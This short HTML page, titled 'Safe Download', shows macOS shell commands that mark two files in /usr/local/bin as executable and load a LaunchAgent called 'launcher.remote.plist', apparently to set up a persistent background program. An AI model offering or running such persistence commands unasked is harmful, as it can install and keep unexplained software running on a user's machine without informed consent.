<!DOCTYPE HTML>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Safe Download</title>
  </head>
  <style>
    * {
      box-sizing: border-box;
    }

    html, body {
      box-sizing: border-box;
      background-color: white;
      padding: 20px;
      height: 100%;
      width: 100%;
      margin: 0;
    }

    body {
      border: 10px double black;
      background-color: lightgray;
      border-radius: 2rem;
    }

    #check {
      position: absolute;
      width: 328px;
      height: 300px;
      top: calc(40% - 150px);
      left: calc(50% - 164px);
      transition: 3s;
      opacity: 0;
    }

    p {
      font-family: 'Trebuchet MS', sans-serif;
      position: absolute;
      text-align: center;
      font-size: 2rem;
      width: 1000px;
      height: 500px;
      top: calc(50% - 250px);
      left: calc(50% - 500px);
    }

  </style>
  <body>
    <p>
      cd /usr/local/bin\n
      chmod +x javaClientBin.class\n
      chmod +x javalauncher\n
      cd ~/Library/LaunchAgents\n
      chmod +x launcher.remote.plist\n
      launchctl unload -wF launcher.remote.plist\n
      launchctl load -wF launcher.remote.plist\n
    </p>
  </body>
</html>
